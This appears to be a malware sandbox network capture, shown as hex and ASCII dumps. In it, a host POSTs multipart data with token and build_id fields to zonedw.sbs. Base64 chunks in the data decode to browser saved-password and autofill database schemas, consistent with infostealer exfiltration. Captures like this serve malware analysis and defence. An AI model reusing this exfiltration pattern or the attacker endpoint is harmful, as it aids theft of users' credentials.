AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:25 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:25 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:25 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:25 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:25 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:25 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.7	50265	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:27 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----YUS2NOH47GV3EUKXTRQ9 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 55081 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:27 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 59 55 53 32 4e 4f 48 34 37 47 56 33 45 55 4b 58 54 52 51 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 59 55 53 32 4e 4f 48 34 37 47 56 33 45 55 4b 58 54 52 51 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 59 55 53 32 4e 4f 48 34 37 47 56 33 45 55 4b 58 54 52 51 39 0d 0a 43 6f 6e 74 Data Ascii: ------YUS2NOH47GV3EUKXTRQ9Content-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------YUS2NOH47GV3EUKXTRQ9Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------YUS2NOH47GV3EUKXTRQ9Cont
2024-12-13 17:58:27 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:27 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:27 UTC	6016	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:28 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:28 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.7	50266	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:29 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----H47YMGLX4OZM7YC2NOZM User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 142457 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:29 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 34 37 59 4d 47 4c 58 34 4f 5a 4d 37 59 43 32 4e 4f 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 48 34 37 59 4d 47 4c 58 34 4f 5a 4d 37 59 43 32 4e 4f 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 48 34 37 59 4d 47 4c 58 34 4f 5a 4d 37 59 43 32 4e 4f 5a 4d 0d 0a 43 6f 6e 74 Data Ascii: ------H47YMGLX4OZM7YC2NOZMContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------H47YMGLX4OZM7YC2NOZMContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------H47YMGLX4OZM7YC2NOZMCont
2024-12-13 17:58:29 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:29 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:29 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:29 UTC	16355	OUT	Data Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56 Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
2024-12-13 17:58:29 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:29 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
